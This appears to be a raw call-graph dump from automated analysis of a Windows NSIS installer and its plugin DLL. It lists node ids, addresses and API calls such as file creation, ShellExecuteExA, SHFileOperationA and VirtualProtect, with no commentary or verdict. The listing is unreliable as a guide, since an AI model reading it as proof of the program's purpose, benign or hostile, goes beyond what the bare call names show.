5385->5386 5387 402775 SetFilePointer 5386->5387 5388 402785 5387->5388 5387->5390 5391 4061b5 wsprintfA 5388->5391 5391->5390 5088 4054d9 5089 405684 5088->5089 5090 4054fb GetDlgItem GetDlgItem GetDlgItem 5088->5090 5092 40568c GetDlgItem CreateThread CloseHandle 5089->5092 5095 4056b4 5089->5095 5134 40432c SendMessageA 5090->5134 5092->5095 5157 40546d 5 API calls 5092->5157 5093 40556b 5100 405572 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5093->5100 5094 4056e2 5098 4056ea 5094->5098 5099 40573d 5094->5099 5095->5094 5096 405703 5095->5096 5097 4056ca ShowWindow ShowWindow 5095->5097 5143 40435e 5096->5143 5139 40432c SendMessageA 5097->5139 5102 4056f2 5098->5102 5103 405716 ShowWindow 5098->5103 5099->5096 5110 40574a SendMessageA 5099->5110 5108 4055e0 5100->5108 5109 4055c4 SendMessageA SendMessageA 5100->5109 5140 4042d0 5102->5140 5106 405736 5103->5106 5107 405728 5103->5107 5105 40570f 5113 4042d0 SendMessageA 5106->5113 5112 40539b 28 API calls 5107->5112 5114 4055f3 5108->5114 5115 4055e5 SendMessageA 5108->5115 5109->5108 5110->5105 5116 405763 CreatePopupMenu 5110->5116 5112->5106 5113->5099 5135 4042f7 5114->5135 5115->5114 5117 4062ea 21 API calls 5116->5117 5119 405773 AppendMenuA 5117->5119 5121 405791 GetWindowRect 5119->5121 5122 4057a4 TrackPopupMenu 5119->5122 5120 405603 5123 405640 GetDlgItem SendMessageA 5120->5123 5124 40560c ShowWindow 5120->5124 5121->5122 5122->5105 5126 4057c0 5122->5126 5123->5105 5125 405667 SendMessageA SendMessageA 5123->5125 5127 405622 ShowWindow 5124->5127 5128 40562f 5124->5128 5125->5105 5129 4057df SendMessageA 5126->5129 5127->5128 5138 40432c SendMessageA 5128->5138 5129->5129 5130 4057fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5129->5130 5132 40581e SendMessageA 5130->5132 5132->5132 5133 405840 GlobalUnlock SetClipboardData CloseClipboard 5132->5133 5133->5105 5134->5093 5136 4062ea 21 API calls 5135->5136 5137 404302 SetDlgItemTextA 5136->5137 5137->5120 5138->5123 5139->5094 5141 4042d7 5140->5141 5142 4042dd SendMessageA 5140->5142 5141->5142 5142->5096 5144 404421 5143->5144 5145 404376 GetWindowLongA 5143->5145 5144->5105 5145->5144 5146 40438b 5145->5146 5146->5144 5147 4043b8 GetSysColor 5146->5147 5148 4043bb 5146->5148 5147->5148 5149 4043c1 SetTextColor 5148->5149 5150 4043cb SetBkMode 5148->5150 5149->5150 5151 4043e3 GetSysColor 5150->5151 5152 4043e9 5150->5152 5151->5152 5153 4043f0 SetBkColor 5152->5153 5154 4043fa 5152->5154 5153->5154 5154->5144 5155 404414 CreateBrushIndirect 5154->5155 5156 40440d DeleteObject 5154->5156 5155->5144 5156->5155 5392 401e5a GetDC 5393 402c3c 21 API calls 5392->5393 5394 401e6c GetDeviceCaps MulDiv ReleaseDC 5393->5394 5395 402c3c 21 API calls 5394->5395 5396 401e9d 5395->5396 5397 4062ea 21 API calls 5396->5397 5398 401eda CreateFontIndirectA 5397->5398 5399 40264d 5398->5399 5400 404ada 5401 404b06 5400->5401 5402 404aea 5400->5402 5404 404b39 5401->5404 5405 404b0c SHGetPathFromIDListA 5401->5405 5411 405951 GetDlgItemTextA 5402->5411 5407 404b23 SendMessageA 5405->5407 5408 404b1c 5405->5408 5406 404af7 SendMessageA 5406->5401 5407->5404 5409 40140b 2 API calls 5408->5409 5409->5407 5411->5406 5412 707522ea 5413 70752354 5412->5413 5414 7075235f GlobalAlloc 5413->5414 5415 7075237e 5413->5415 5414->5413 4187 4015e0 4206 402c5e 4187->4206 4191 401649 4193 401677 4191->4193 4194 40164e 4191->4194 4197 401423 28 API calls 4193->4197 4228 401423 4194->4228 4204 40166f 4197->4204 4201 401660 SetCurrentDirectoryA 4201->4204 4202 401631 GetFileAttributesA 4203 4015ef 4202->4203 4203->4191 4203->4202 4218 405c14 4203->4218 4222 4058d8 4203->4222 4225 405861 CreateDirectoryA 4203->4225 4232 4058bb CreateDirectoryA 4203->4232 4207 402c6a 4206->4207 4235 4062ea 4207->4235 4210 4015e7 4212 405c82 CharNextA CharNextA 4210->4212 4213 405c9d 4212->4213 4216 405cad 4212->4216 4215 405ca8 CharNextA 4213->4215 4213->4216 4214 405ccd 4214->4203 4215->4214 4216->4214 4217 405c14 CharNextA 4216->4217 4217->4216 4219 405c1a 4218->4219 4220 405c2d 4219->4220 4221 405c20 CharNextA 4219->4221 4220->4203 4221->4219 4223 40667f 5 API calls 4222->4223 4224 4058df 4223->4224 4224->4203 4226 4058b1 GetLastError 4225->4226 4227 4058ad 4225->4227 4226->4227 4227->4203 4282 40539b 4228->4282 4231 406257 lstrcpynA 4231->4201 4233 4058cb 4232->4233 4234 4058cf GetLastError 4232->4234 4233->4203 4234->4233 4250 4062f7 4235->4250 4236 406538 4237 402c8b 4236->4237 4274 406257 lstrcpynA 4236->4274 4237->4210 4252 406551 4237->4252 4239 40650f lstrlenA 4239->4250 4241 4062ea 15 API calls 4241->4239 4244 406416 GetSystemDirectoryA 4244->4250 4245 40642c GetWindowsDirectoryA 4245->4250 4246 406551 5 API calls 4246->4250 4247 4062ea 15 API calls 4247->4250 4248 4064b8 lstrcatA 4248->4250 4250->4236 4250->4239 4250->4241 4250->4244 4250->4245 4250->4246 4250->4247 4250->4248 4251 40648f SHGetPathFromIDListA CoTaskMemFree 4250->4251 4261 40613e 4250->4261 4266 40667f GetModuleHandleA 4250->4266 4272 4061b5 wsprintfA 4250->4272 4273 406257 lstrcpynA 4250->4273 4251->4250 4259 40655d 4252->4259 4253 4065c9 CharPrevA 4256 4065c5 4253->4256 4254 4065ba CharNextA 4254->4256 4254->4259 4255 405c14 CharNextA 4255->4259 4256->4253 4257 4065e4 4256->4257 4257->4210 4258 4065a8 CharNextA 4258->4259 4259->4254 4259->4255 4259->4256 4259->4258 4260 4065b5 CharNextA 4259->4260 4260->4254 4275 4060dd 4261->4275 4264 406172 RegQueryValueExA RegCloseKey 4265 4061a1 4264->4265 4265->4250 4267 4066a5 GetProcAddress 4266->4267 4268 40669b 4266->4268 4269 4066b4 4267->4269 4279 406611 GetSystemDirectoryA 4268->4279 4269->4250 4271 4066a1 4271->4267 4271->4269 4272->4250 4273->4250 4274->4237 4276 4060ec 4275->4276 4277 4060f0 4276->4277 4278 4060f5 RegOpenKeyExA 4276->4278 4277->4264 4277->4265 4278->4277 4280 406633 wsprintfA LoadLibraryExA 4279->4280 4280->4271 4283 401431 4282->4283 4284 4053b6 4282->4284 4283->4231 4285 4053d3 lstrlenA 4284->4285 4286 4062ea 21 API calls 4284->4286 4287 4053e1 lstrlenA 4285->4287 4288 4053fc 4285->4288 4286->4285 4287->4283 4289 4053f3 lstrcatA 4287->4289 4290 405402 SetWindowTextA 4288->4290 4291 40540f 4288->4291 4289->4288 4290->4291 4291->4283 4292 405415 SendMessageA SendMessageA SendMessageA 4291->4292 4292->4283 5416 4016e0 5417 402c5e 21 API calls 5416->5417 5418 4016e6 GetFullPathNameA 5417->5418 5419 4016fd 5418->5419 5425 40171e 5418->5425 5421 4065ea 2 API calls 5419->5421 5419->5425 5420 401732 GetShortPathNameA 5422 402aea 5420->5422 5423 40170e 5421->5423 5423->5425 5426 406257 lstrcpynA 5423->5426 5425->5420 5425->5422 5426->5425 5427 404462 5428 404478 5427->5428 5436 404584 5427->5436 5430 4042f7 22 API calls 5428->5430 5429 4045f3 5431 4046bd 5429->5431 5432 4045fd GetDlgItem 5429->5432 5433 4044ce 5430->5433 5438 40435e 8 API calls 5431->5438 5434 404613 5432->5434 5435 40467b 5432->5435 5437 4042f7 22 API calls 5433->5437 5434->5435 5443 404639 SendMessageA LoadCursorA SetCursor 5434->5443 5435->5431 5444 40468d 5435->5444 5436->5429 5436->5431 5439 4045c8 GetDlgItem SendMessageA 5436->5439 5441 4044db CheckDlgButton 5437->5441 5442 4046b8 5438->5442 5460 404319 KiUserCallbackDispatcher 5439->5460 5458 404319 KiUserCallbackDispatcher 5441->5458 5464 404706 5443->5464 5448 404693 SendMessageA 5444->5448 5449 4046a4 5444->5449 5445 4045ee 5461 4046e2 5445->5461 5448->5449 5449->5442 5453 4046aa SendMessageA 5449->5453 5451 4044f9 GetDlgItem 5459 40432c SendMessageA 5451->5459 5453->5442 5455 40450f SendMessageA 5456 404536 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5455->5456 5457 40452d GetSysColor 5455->5457 5456->5442 5457->5456 5458->5451 5459->5455 5460->5445 5462 4046f0 5461->5462 5463 4046f5 SendMessageA 5461->5463 5462->5463 5463->5429 5467 405933 ShellExecuteExA 5464->5467 5466 40466c LoadCursorA SetCursor 5466->5435 5467->5466 5475 401eea 5476 402c3c 21 API calls 5475->5476 5477 401ef0 5476->5477 5478 402c3c 21 API calls 5477->5478 5479 401efc 5478->5479 5480 401f13 EnableWindow 5479->5480 5481 401f08 ShowWindow 5479->5481 5482 402aea 5480->5482 5481->5482 4979 40176b 4980 402c5e 21 API calls 4979->4980 4981 401772 4980->4981 4982 405e19 2 API calls 4981->4982 4983 401779 4982->4983 4984 405e19 2 API calls 4983->4984 4984->4983 5483 40196c 5484 402c5e 21 API calls 5483->5484 5485 401973 lstrlenA 5484->5485 5486 40264d 5485->5486 5487 70751058 5489 70751074 5487->5489 5488 707510dc 5489->5488 5490 70751091 5489->5490 5491 7075154b GlobalFree 5489->5491 5492 7075154b GlobalFree 5490->5492 5491->5490 5493 707510a1 5492->5493 5494 707510b1 5493->5494 5495 707510a8 GlobalSize 5493->5495 5496 707510b5 GlobalAlloc 5494->5496 5498 707510c6 5494->5498 5495->5494 5497 70751572 3 API calls 5496->5497 5497->5498 5499 707510d1 GlobalFree 5498->5499 5499->5488 5500 401ff0 5501 402c5e 21 API calls 5500->5501 5502 401ff7 5501->5502 5503 4065ea 2 API calls 5502->5503 5504 401ffd 5503->5504 5506 40200f 5504->5506 5507 4061b5 wsprintfA 5504->5507 5507->5506 5508 707518c7 5510 707518ea 5508->5510 5509 7075192c 5512 707512f6 2 API calls 5509->5512 5510->5509 5511 7075191a GlobalFree 5510->5511 5511->5509 5513 70751aae GlobalFree GlobalFree 5512->5513 5514 406973 5515 4067f7 5514->5515 5516 407162 5515->5516 5517 406881 GlobalAlloc 5515->5517 5518 406878 GlobalFree 5515->5518 5519 4068f8 GlobalAlloc 5515->5519 5520 4068ef GlobalFree 5515->5520 5517->5515 5517->5516 5518->5517 5519->5515 5519->5516 5520->5519 5521 4014f4 SetForegroundWindow 5522 402aea 5521->5522 5530 404cfc GetDlgItem GetDlgItem 5531 404d52 7 API calls 5530->5531 5536 404f79 5530->5536 5532 404dfa DeleteObject 5531->5532 5533 404dee SendMessageA 5531->5533 5534 404e05 5532->5534 5533->5532 5535 404e3c 5534->5535 5537 4062ea 21 API calls 5534->5537 5538 4042f7 22 API calls 5535->5538 5545 40505b 5536->5545 5565 404fe8 5536->5565 5584 404c4a SendMessageA 5536->5584 5541 404e1e SendMessageA SendMessageA 5537->5541 5542 404e50 5538->5542 5539 405107 5540 405111 SendMessageA 5539->5540 5548 405119 5539->5548 5540->5548 5541->5534 5550 4042f7 22 API calls 5542->5550 5543 404f6c 5547 40435e 8 API calls 5543->5547 5544 4050b4 SendMessageA 5544->5543 5552 4050c9 SendMessageA 5544->5552 5545->5539 5545->5543 5545->5544 5546 40504d SendMessageA 5546->5545 5553 405308 5547->5553 5554 405132 5548->5554 5555 40512b ImageList_Destroy 5548->5555 5559 405142 5548->5559 5562 404e61 5550->5562 5551 4052bc 5551->5543 5560 4052ce ShowWindow GetDlgItem ShowWindow 5551->5560 5557 4050dc 5552->5557 5558 40513b GlobalFree 5554->5558 5554->5559 5555->5554 5556 404f3b GetWindowLongA SetWindowLongA 5561 404f54 5556->5561 5567 4050ed SendMessageA 5557->5567 5558->5559 5559->5551 5577 40517d 5559->5577 5589 404cca 5559->5589 5560->5543 5563 404f71 5561->5563 5564 404f59 ShowWindow 5561->5564 5562->5556 5566 404eb3 SendMessageA 5562->5566 5568 404f36 5562->5568 5571 404ef1 SendMessageA 5562->5571 5572 404f05 SendMessageA 5562->5572 5583 40432c SendMessageA 5563->5583 5582 40432c SendMessageA 5564->5582 5565->5545 5565->5546 5566->5562 5567->5539 5568->5556 5568->5561 5571->5562 5572->5562 5574 405287 5575 405292 InvalidateRect 5574->5575 5578 40529e 5574->5578 5575->5578 5576 4051ab SendMessageA 5581 4051c1 5576->5581 5577->5576 5577->5581 5578->5551 5598 404c05 5578->5598 5580 405235 SendMessageA SendMessageA 5580->5581 5581->5574 5581->5580 5582->5543 5583->5536 5585 404ca9 SendMessageA 5584->5585 5586 404c6d GetMessagePos ScreenToClient SendMessageA 5584->5586 5587 404ca1 5585->5587 5586->5587 5588 404ca6 5586->5588 5587->5565 5588->5585 5601 406257 lstrcpynA 5589->5601 5591 404cdd 5602 4061b5 wsprintfA 5591->5602 5593 404ce7 5594 40140b 2 API calls 5593->5594 5595 404cf0 5594->5595 5603 406257 lstrcpynA 5595->5603 5597 404cf7 5597->5577 5604 404b40 5598->5604 5600 404c1a 5600->5551 5601->5591 5602->5593 5603->5597 5605 404b56 5604->5605 5606 4062ea 21 API calls 5605->5606 5607 404bba 5606->5607 5608 4062ea 21 API calls 5607->5608 5609 404bc5 5608->5609 5610 4062ea 21 API calls 5609->5610 5611 404bdb lstrlenA wsprintfA SetDlgItemTextA 5610->5611 5611->5600 5158 403dfd 5159 403e15 5158->5159 5160 403f76 5158->5160 5159->5160 5161 403e21 5159->5161 5162 403fc7 5160->5162 5163 403f87 GetDlgItem GetDlgItem 5160->5163 5164 403e2c SetWindowPos 5161->5164 5165 403e3f 5161->5165 5167 404021 5162->5167 5172 401389 2 API calls 5162->5172 5166 4042f7 22 API calls 5163->5166 5164->5165 5169 403e48 ShowWindow 5165->5169 5170 403e8a 5165->5170 5171 403fb1 SetClassLongA 5166->5171 5168 404343 SendMessageA 5167->5168 5173 403f71 5167->5173 5198 404033 5168->5198 5174 403f63 5169->5174 5175 403e68 GetWindowLongA 5169->5175 5176 403e92 DestroyWindow 5170->5176 5177 403ea9 5170->5177 5178 40140b 2 API calls 5171->5178 5179 403ff9 5172->5179 5180 40435e 8 API calls 5174->5180 5175->5174 5181 403e81 ShowWindow 5175->5181 5182 404280 5176->5182 5183 403eae SetWindowLongA 5177->5183 5184 403ebf 5177->5184 5178->5162 5179->5167 5186 403ffd SendMessageA 5179->5186 5180->5173 5181->5170 5182->5173 5191 4042b1 ShowWindow 5182->5191 5183->5173 5184->5174 5185 403ecb GetDlgItem 5184->5185 5189 403ef9 5185->5189 5190 403edc SendMessageA IsWindowEnabled 5185->5190 5186->5173 5187 40140b 2 API calls 5187->5198 5188 404282 DestroyWindow EndDialog 5188->5182 5193 403f06 5189->5193 5194 403f4d SendMessageA 5189->5194 5195 403f19 5189->5195 5205 403efe 5189->5205 5190->5173 5190->5189 5191->5173 5192 4062ea 21 API calls 5192->5198 5193->5194 5193->5205 5194->5174 5199 403f21 5195->5199 5200 403f36 5195->5200 5196 4042d0 SendMessageA 5201 403f34 5196->5201 5197 4042f7 22 API calls 5197->5198 5198->5173 5198->5187 5198->5188 5198->5192 5198->5197 5206 4042f7 22 API calls 5198->5206 5222 4041c2 DestroyWindow 5198->5222 5203 40140b 2 API calls 5199->5203 5202 40140b 2 API calls 5200->5202 5201->5174 5204 403f3d 5202->5204 5203->5205 5204->5174 5204->5205 5205->5196 5207 4040ae GetDlgItem 5206->5207 5208 4040c3 5207->5208 5209 4040cb ShowWindow KiUserCallbackDispatcher 5207->5209 5208->5209 5231 404319 KiUserCallbackDispatcher 5209->5231 5211 4040f5 EnableWindow 5216 404109 5211->5216 5212 40410e GetSystemMenu EnableMenuItem SendMessageA 5213 40413e SendMessageA 5212->5213 5212->5216 5213->5216 5215 403dde 22 API calls 5215->5216 5216->5212 5216->5215 5232 40432c SendMessageA 5216->5232 5233 406257 lstrcpynA 5216->5233 5218 40416d lstrlenA 5219 4062ea 21 API calls 5218->5219 5220 40417e SetWindowTextA 5219->5220 5221 401389 2 API calls 5220->5221 5221->5198 5222->5182 5223 4041dc CreateDialogParamA 5222->5223 5223->5182 5224 40420f 5223->5224 5225 4042f7 22 API calls 5224->5225 5226 40421a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5225->5226 5227 401389 2 API calls 5226->5227 5228 404260 5227->5228 5228->5173 5229 404268 ShowWindow 5228->5229 5230 404343 SendMessageA 5229->5230 5230->5182 5231->5211 5232->5216 5233->5218 5612 707516c8 5613 707516f7 5612->5613 5614 70751b28 18 API calls 5613->5614 5615 707516fe 5614->5615 5616 70751705 5615->5616 5617 70751711 5615->5617 5618 707512f6 2 API calls 5616->5618 5619 70751738 5617->5619 5620 7075171b 5617->5620 5621 7075170f 5618->5621 5623 70751762 5619->5623 5624 7075173e 5619->5624 5622 70751572 3 API calls 5620->5622 5626 70751720 5622->5626 5625 70751572 3 API calls 5623->5625 5627 707515e9 3 API calls 5624->5627 5625->5621 5628 707515e9 3 API calls 5626->5628 5629 70751743 5627->5629 5631 70751726 5628->5631 5630 707512f6 2 API calls 5629->5630 5632 70751749 GlobalFree 5630->5632 5633 707512f6 2 API calls 5631->5633 5632->5621 5634 7075175d GlobalFree 5632->5634 5635 7075172c GlobalFree 5633->5635 5634->5621 5635->5621 5234 40177e 5235 402c5e 21 API calls 5234->5235 5236 401785 5235->5236 5237 4017a3 5236->5237 5238 4017ab 5236->5238 5273 406257 lstrcpynA 5237->5273 5274 406257 lstrcpynA 5238->5274 5241 4017a9 5245 406551 5 API calls 5241->5245 5242 4017b6 5243 405be9 3 API calls 5242->5243 5244 4017bc lstrcatA 5243->5244 5244->5241 5260 4017c8 5245->5260 5246 4065ea 2 API calls 5246->5260 5247 405dc5 2 API calls 5247->5260 5249 4017df CompareFileTime 5249->5260 5250 4018a3 5251 40539b 28 API calls 5250->5251 5254 4018ad 5251->5254 5252 40539b 28 API calls 5262 40188f 5252->5262 5253 406257 lstrcpynA 5253->5260 5255 403168 39 API calls 5254->5255 5256 4018c0 5255->5256 5257 4018d4 SetFileTime 5256->5257 5258 4018e6 CloseHandle 5256->5258 5257->5258 5261 4018f7 5258->5261 5258->5262 5259 4062ea 21 API calls 5259->5260 5260->5246 5260->5247 5260->5249 5260->5250 5260->5253 5260->5259 5267 40596d MessageBoxIndirectA 5260->5267 5270 40187a 5260->5270 5272 405dea GetFileAttributesA CreateFileA 5260->5272 5263 4018fc 5261->5263 5264 40190f 5261->5264 5265 4062ea 21 API calls 5263->5265 5266 4062ea 21 API calls 5264->5266 5268 401904 lstrcatA 5265->5268 5269 401917 5266->5269 5267->5260 5268->5269 5269->5262 5271 40596d MessageBoxIndirectA 5269->5271 5270->5252 5270->5262 5271->5262 5272->5260 5273->5241 5274->5242 5636 40167e 5637 402c5e 21 API calls 5636->5637 5638 401684 5637->5638 5639 4065ea 2 API calls 5638->5639 5640 40168a 5639->5640 5641 40197e 5642 402c3c 21 API calls 5641->5642 5643 401985 5642->5643 5644 402c3c 21 API calls 5643->5644 5645 401992 5644->5645 5646 402c5e 21 API calls 5645->5646 5647 4019a9 lstrlenA 5646->5647 5649 4019b9 5647->5649 5648 4019f9 5649->5648 5653 406257 lstrcpynA 5649->5653 5651 4019e9 5651->5648 5652 4019ee lstrlenA 5651->5652 5652->5648 5653->5651 5654 401000 5655 401037 BeginPaint GetClientRect 5654->5655 5656 40100c DefWindowProcA 5654->5656 5658 4010f3 5655->5658 5659 401179 5656->5659 5660 401073 CreateBrushIndirect FillRect DeleteObject 5658->5660 5661 4010fc 5658->5661 5660->5658 5662 401102 CreateFontIndirectA 5661->5662 5663 401167 EndPaint 5661->5663 5662->5663 5664 401112 6 API calls 5662->5664 5663->5659 5664->5663 5665 401502 5666 401507 5665->5666 5667 40152d 5665->5667 5668 402c3c 21 API calls 5666->5668 5668->5667 5669 401a83 5670 402c3c 21 API calls 5669->5670 5671 401a8c 5670->5671 5672 402c3c 21 API calls 5671->5672 5673 401a33 5672->5673 4779 707529b1 4780 70752a01 4779->4780 4781 707529c1 VirtualProtect 4779->4781 4781->4780 5674 7075103d 5677 7075101b 5674->5677 5678 7075154b GlobalFree 5677->5678 5679 70751020 5678->5679 5680 70751024 5679->5680 5681 70751027 GlobalAlloc 5679->5681 5682 70751572 3 API calls 5680->5682 5681->5680 5683 7075103b 5682->5683 5684 401588 5685 402a67 5684->5685 5688 4061b5 wsprintfA 5685->5688 5687 402a6c 5688->5687 5689 401b88 5690 402c5e 21 API calls 5689->5690 5691 401b8f 5690->5691 5692 402c3c 21 API calls 5691->5692 5693 401b98 wsprintfA 5692->5693 5694 402aea 5693->5694 5695 404789 5696 4047b5 5695->5696 5697 4047c6 5695->5697 5756 405951 GetDlgItemTextA 5696->5756 5699 4047d2 GetDlgItem 5697->5699 5705 404831 5697->5705 5701 4047e6 5699->5701 5700 4047c0 5703 406551 5 API calls 5700->5703 5704 4047fa SetWindowTextA 5701->5704 5708 405c82 4 API calls 5701->5708 5702 404915 5752 404abf 5702->5752 5758 405951 GetDlgItemTextA 5702->5758 5703->5697 5709 4042f7 22 API calls 5704->5709 5705->5702 5710 4062ea 21 API calls 5705->5710 5705->5752 5707 40435e 8 API calls 5712 404ad3 5707->5712 5713 4047f0 5708->5713 5714 404816 5709->5714 5715 4048a5 SHBrowseForFolderA 5710->5715 5711 404945 5716 405cd7 18 API calls 5711->5716 5713->5704 5722 405be9 3 API calls 5713->5722 5717 4042f7 22 API calls 5714->5717 5715->5702 5718 4048bd CoTaskMemFree 5715->5718 5719 40494b 5716->5719 5720 404824 5717->5720 5721 405be9 3 API calls 5718->5721 5759 406257 lstrcpynA 5719->5759 5757 40432c SendMessageA 5720->5757 5724 4048ca 5721->5724 5722->5704 5727 404901 SetDlgItemTextA 5724->5727 5731 4062ea 21 API calls 5724->5731 5726 40482a 5729 40667f 5 API calls 5726->5729 5727->5702 5728 404962 5730 40667f 5 API calls 5728->5730 5729->5705 5738 404969 5730->5738 5732 4048e9 lstrcmpiA 5731->5732 5732->5727 5735 4048fa lstrcatA 5732->5735 5733 4049a5 5760 406257 lstrcpynA 5733->5760 5735->5727 5736 4049ac 5737 405c82 4 API calls 5736->5737 5739 4049b2 GetDiskFreeSpaceA 5737->5739 5738->5733 5742 405c30 2 API calls 5738->5742 5743 4049fd 5738->5743 5741 4049d6 MulDiv 5739->5741 5739->5743 5741->5743 5742->5738 5744 404c05 24 API calls 5743->5744 5753 404a6e 5743->5753 5746 404a5b 5744->5746 5745 404a91 5761 404319 KiUserCallbackDispatcher 5745->5761 5748 404a70 SetDlgItemTextA 5746->5748 5749 404a60 5746->5749 5747 40140b 2 API calls 5747->5745 5748->5753 5751 404b40 24 API calls 5749->5751 5751->5753 5752->5707 5753->5745 5753->5747 5754 404aad 5754->5752 5755 4046e2 SendMessageA 5754->5755 5755->5752 5756->5700 5757->5726 5758->5711 5759->5728 5760->5736 5761->5754 5762 401d8a 5763 401d90 5762->5763 5764 401d9d GetDlgItem 5762->5764 5765 402c3c 21 API calls 5763->5765 5766 401d97 5764->5766 5765->5766 5767 401dde GetClientRect LoadImageA SendMessageA 5766->5767 5769 402c5e 21 API calls 5766->5769 5770 401e3f 5767->5770 5772 401e4b 5767->5772 5769->5767 5771 401e44 DeleteObject 5770->5771 5770->5772 5771->5772 5773 40278b 5774 402791 5773->5774 5775 402799 FindClose 5774->5775 5776 402aea 5774->5776 5775->5776 5008 40240d 5009 402c5e 21 API calls 5008->5009 5010 40241e 5009->5010 5011 402c5e 21 API calls 5010->5011 5012 402427 5011->5012 5013 402c5e 21 API calls 5012->5013 5014 402431 GetPrivateProfileStringA 5013->5014 5777 40280d 5778 402c5e 21 API calls 5777->5778 5779 402819 5778->5779 5780 40282f 5779->5780 5782 402c5e 21 API calls 5779->5782 5781 405dc5 2 API calls 5780->5781 5783 402835 5781->5783 5782->5780 5805 405dea GetFileAttributesA CreateFileA 5783->5805 5785 402842 5786 4028fe 5785->5786 5787 4028e6 5785->5787 5788 40285d GlobalAlloc 5785->5788 5789 402905 DeleteFileA 5786->5789 5790 402918 5786->5790 5792 403168 39 API calls 5787->5792 5788->5787 5791 402876 5788->5791 5789->5790 5806 40335a SetFilePointer 5791->5806 5794 4028f3 CloseHandle 5792->5794 5794->5786 5795 40287c 5796 403344 ReadFile 5795->5796 5797 402885 GlobalAlloc 5796->5797 5798 402895 5797->5798 5799 4028cf 5797->5799 5801 403168 39 API calls 5798->5801 5800 405e91 WriteFile 5799->5800 5802 4028db GlobalFree 5800->5802 5804 4028a2 5801->5804 5802->5787 5803 4028c6 GlobalFree 5803->5799 5804->5803 5805->5785 5806->5795 5807 40530f 5808 405333 5807->5808 5809 40531f 5807->5809 5812 40533b IsWindowVisible 5808->5812 5818 405352 5808->5818 5810 405325 5809->5810 5811 40537c 5809->5811 5814 404343 SendMessageA 5810->5814 5813 405381 CallWindowProcA 5811->5813 5812->5811 5815 405348 5812->5815 5816 40532f 5813->5816 5814->5816 5817 404c4a 5 API calls 5815->5817 5817->5818 5818->5813 5819 404cca 4 API calls 5818->5819 5819->5811 5820 40168f 5821 402c5e 21 API calls 5820->5821 5822 401696 5821->5822 5823 402c5e 21 API calls 5822->5823 5824 40169f 5823->5824 5825 402c5e 21 API calls 5824->5825 5826 4016a8 MoveFileA 5825->5826 5827 4016bb 5826->5827 5833 4016b4 5826->5833 5828 4065ea 2 API calls 5827->5828 5831 40230f 5827->5831 5830 4016ca 5828->5830 5829 401423 28 API calls 5829->5831 5830->5831 5832 406030 40 API calls 5830->5832 5832->5833 5833->5829 5834 401490 5835 40539b 28 API calls 5834->5835 5836 401497 5835->5836 5837 401a12 5838 402c5e 21 API calls 5837->5838 5839 401a19 5838->5839 5840 402c5e 21 API calls 5839->5840 5841 401a22 5840->5841 5842 401a29 lstrcmpiA 5841->5842 5843 401a3b lstrcmpA 5841->5843 5844 401a2f 5842->5844 5843->5844 5046 401594 5047 4015a4 ShowWindow 5046->5047 5048 4015ab 5046->5048 5047->5048 5049 4015b9 ShowWindow 5048->5049 5050 402aea 5048->5050 5049->5050 5073 402318 5074 402c5e 21 API calls 5073->5074 5075 40231e 5074->5075 5076 402c5e 21 API calls 5075->5076 5077 402327 5076->5077 5078 402c5e 21 API calls 5077->5078 5079 402330 5078->5079 5080 4065ea 2 API calls 5079->5080 5081 402339 5080->5081 5082 40234a lstrlenA lstrlenA 5081->5082 5086 40233d 5081->5086 5083 40539b 28 API calls 5082->5083 5085 402386 SHFileOperationA 5083->5085 5084 40539b 28 API calls 5087 402345 5084->5087 5085->5086 5085->5087 5086->5084 5086->5087 5852 402198 5853 402c5e 21 API calls 5852->5853 5854 40219f 5853->5854 5855 402c5e 21 API calls 5854->5855 5856 4021a9 5855->5856 5857 402c5e 21 API calls 5856->5857 5858 4021b3 5857->5858 5859 402c5e 21 API calls 5858->5859 5860 4021c0 5859->5860 5861 402c5e 21 API calls 5860->5861 5862 4021ca 5861->5862 5863 40220c CoCreateInstance 5862->5863 5864 402c5e 21 API calls 5862->5864 5867 40222b 5863->5867 5869 4022d9 5863->5869 5864->5863 5865 401423 28 API calls 5866 40230f 5865->5866 5868 4022b9 MultiByteToWideChar 5867->5868 5867->5869 5868->5869 5869->5865 5869->5866 5870 40269a 5871 402c3c 21 API calls 5870->5871 5876 4026a4 5871->5876 5872 402712 5873 405e62 ReadFile 5873->5876 5874 402714 5879 4061b5 wsprintfA 5874->5879 5875 402724 5875->5872 5878 40273a SetFilePointer 5875->5878 5876->5872 5876->5873 5876->5874 5876->5875 5878->5872 5879->5872 5880 40239a 5881 4023a1 5880->5881 5884 4023b4 5880->5884 5882 4062ea 21 API calls 5881->5882 5883 4023ae 5882->5883 5883->5884 5885 40596d MessageBoxIndirectA 5883->5885 5885->5884 5886 402a1b 5887 402a22 5886->5887 5888 402a6e 5886->5888 5891 402c3c 21 API calls 5887->5891 5894 402a6c 5887->5894 5889 40667f 5 API calls 5888->5889 5890 402a75 5889->5890 5892 402c5e 21 API calls 5890->5892 5893 402a30 5891->5893 5895 402a7e 5892->5895 5896 402c3c 21 API calls 5893->5896 5895->5894 5904 4062aa 5895->5904 5898 402a3f 5896->5898 5903 4061b5 wsprintfA 5898->5903 5899 402a8c 5899->5894 5908 406294 5899->5908 5903->5894 5905 4062b5 5904->5905 5906 4062d8 IIDFromString 5905->5906 5907 4062d1 5905->5907 5906->5899 5907->5899 5911 406279 WideCharToMultiByte 5908->5911 5910 402aad CoTaskMemFree 5910->5894 5911->5910 5912 40149d 5913 4023b4 5912->5913 5914 4014ab PostQuitMessage 5912->5914 5914->5913 5915 403a1e 5916 403a29 5915->5916 5917 403a30 GlobalAlloc 5916->5917 5918 403a2d 5916->5918 5917->5918 5919 401f1e 5920 402c5e 21 API calls 5919->5920 5921 401f24 5920->5921 5922 402c5e 21 API calls 5921->5922 5923 401f2d 5922->5923 5924 402c5e 21 API calls 5923->5924 5925 401f36 5924->5925 5926 402c5e 21 API calls 5925->5926 5927 401f3f 5926->5927 5928 401423 28 API calls 5927->5928 5929 401f46 5928->5929 5936 405933 ShellExecuteExA 5929->5936 5931 401f81 5932 4066f4 5 API calls 5931->5932 5934 4027ed 5931->5934 5933 401f9b CloseHandle 5932->5933 5933->5934 5936->5931 5937 40291e 5938 402c3c 21 API calls 5937->5938 5939 402924 5938->5939 5940 402966 5939->5940 5941 40294c 5939->5941 5947 4027ed 5939->5947 5943 402980 5940->5943 5944 402970 5940->5944 5942 402951 5941->5942 5950 402960 5941->5950 5951 406257 lstrcpynA 5942->5951 5946 4062ea 21 API calls 5943->5946 